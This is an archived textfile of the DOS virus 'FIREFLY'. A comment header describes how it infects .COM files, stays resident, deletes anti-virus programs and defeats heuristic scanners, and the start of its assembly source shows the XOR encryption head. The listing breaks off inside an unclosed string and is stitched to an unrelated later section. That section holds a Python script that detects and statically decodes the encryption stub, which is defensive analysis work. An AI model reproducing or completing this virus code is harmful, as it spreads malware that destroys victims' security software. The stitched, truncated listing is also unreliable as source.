💾 Archived View for spam.works › mirrors › textfiles › virus › firefly.txt captured on 2023-11-14 at 12:50:49.
;FIREFLY virus, by Nikademus.
;
;Firefly is an encrypted, memory resident virus which infects
;.COM files on load. It incorporates code from Proto-T,
;LokJaw and YB-X viruses and, when in memory, attacks a large selection
;of anti-virus programs as they are executed. Anti-virus programs
;identified by Firefly's execute/load handler are deleted.
;Firefly incorporates simple code from previous issues of the newsletter
;designed to de-install generic VSAFE resident virus activity
;filters designed for Microsoft by Central Point Software. It
;contains instructions - specifically a segment of pseudo-nested
;loops - which spoof F-Protect's expert system generic virus
;identification feature.
;
;FIREFLY also includes a visual marker tied to the system timer
;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
;and ScrollLock LEDs on the keyboard. This produces a noticeable
;twinkling effect when the virus is active on a machine.
;
;Anti-anti-virus measures used by Firefly vary in effectiveness
;dependent upon how a user employs software. For example, while
;Firefly is designed to delete the Victor Charlie anti-virus
;shell, VC.EXE, a user who employs the software package's utilities
;for generic virus detection singly will not be interfered with
;by the virus. Your results may vary, but the virus does effectively
;delete anti-virus programs while in memory unless steps are taken
;beforehand to avoid this.
;
;Firefly incorporates minor code armoring techniques designed to thwart
;trivial debugging.

                .radix 16

code            segment
                model  small
                assume cs:code, ds:code, es:code

                org 100h

len             equ offset last - start
vir_len         equ len / 16d                   ; 16 bytes per paragraph
encryptlength   equ (last - begin)/4+1

start:
                mov     bx, offset begin        ; The Encryption Head
                mov     cx, encryptlength       ;
encryption_loop:                                ;
                db      81h                     ; XOR WORD PTR [BX], ????h
                db      37h                     ;
encryption_value_1:                             ;
                dw      0000h                   ;
                                                ;
                db      81h                     ; XOR WORD PTR [BX+2], ????h
                db      77h                     ;
                db      02h                     ; 2 different random words
encryption_value_2:                             ; give 32-bit encryption
                dw      0000h                   ;
                add     bx, 4                   ;
                loop    encryption_loop         ;
begin:
                jmp     virus
                db      '[Firefly] By Nikademus
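
Because the head above is a fixed instruction sequence in which only the operands and the two key words vary, it can be matched with a wildcard byte signature and the body decoded statically for analysis. The following is an added example, not part of the original listing: the function names, the two accepted encodings of "add bx,4", the E2 encoding of "loop", and the sample bytes (a constructed buffer with a harmless ASCII body) are assumptions.

```python
import re
import struct

# Stub bytes from the listing: mov bx,imm16 / mov cx,imm16 / 81 37 k1 / 81 77 02 k2,
# then add bx,4 and loop. Operands and key words are wildcards.
# Assumption: "add bx,4" assembles to 83 C3 04 or 81 C3 04 00, "loop" to E2 rel8.
STUB = re.compile(
    rb"\xBB(?P<bx>..)\xB9(?P<cx>..)"
    rb"\x81\x37(?P<k1>..)"
    rb"\x81\x77\x02(?P<k2>..)"
    rb"(?:\x83\xC3\x04|\x81\xC3\x04\x00)\xE2.",
    re.DOTALL,
)
COM_BASE = 0x100  # .COM images load at offset 100h ("org 100h" in the listing)

def find_stub(image: bytes):
    """Return the stub's parameters for the first match in a .COM image, else None."""
    m = STUB.search(image)
    if m is None:
        return None
    bx, cx, k1, k2 = (struct.unpack("<H", m.group(n))[0] for n in ("bx", "cx", "k1", "k2"))
    if bx < COM_BASE:          # pointer outside the file image: not a usable match
        return None
    return {"stub_offset": m.start(), "body_offset": bx - COM_BASE,
            "dwords": cx, "key1": k1, "key2": k2}

def xor_body(image: bytes, info: dict) -> bytes:
    """Apply the stub's loop statically: key1 on each low word, key2 on each high word."""
    out = bytearray(image)
    end = min(info["body_offset"] + 4 * info["dwords"], len(out) - 3)
    for off in range(info["body_offset"], end, 4):
        lo, hi = struct.unpack_from("<HH", out, off)
        struct.pack_into("<HH", out, off, lo ^ info["key1"], hi ^ info["key2"])
    return bytes(out)

# Constructed sample (not from the page): the 20-byte stub with made-up keys
# 1234h/BEEFh, followed by 16 bytes of harmless ASCII encoded with those keys.
PLAIN = b"BENIGN TEST BODY"
_raw = bytes.fromhex("bb1401b90400" "81373412" "817702efbe" "83c304e2f2") + PLAIN
SAMPLE = xor_body(_raw, find_stub(_raw))   # XOR is its own inverse

if __name__ == "__main__":
    info = find_stub(SAMPLE)
    print({k: hex(v) for k, v in info.items()})
    print(xor_body(SAMPLE, info)[info["body_offset"]:])
```

Since the key words change per infected file, a scanner keys on the fixed opcode bytes around them, and the recovered keys let an analyst read the encoded body without executing the sample.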